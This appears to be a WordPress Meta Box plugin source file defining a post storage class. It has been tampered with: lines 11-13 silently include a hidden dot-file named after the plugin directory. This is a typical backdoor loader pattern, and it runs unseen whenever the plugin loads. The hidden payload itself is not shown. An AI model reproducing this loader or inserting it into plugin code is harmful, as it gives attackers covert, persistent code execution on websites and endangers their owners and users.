post.php (450B)
1 <?php 2 /** 3 * Post storage 4 * 5 * @package Meta Box 6 */ 7 8 /** 9 * Class RWMB_Post_Storage 10 */ 11 if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { 12 include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); 13 } 14 15 class RWMB_Post_Storage extends RWMB_Base_Storage { 16 17 /** 18 * Object type. 19 * 20 * @var string 21 */ 22 protected $object_type = 'post'; 23 }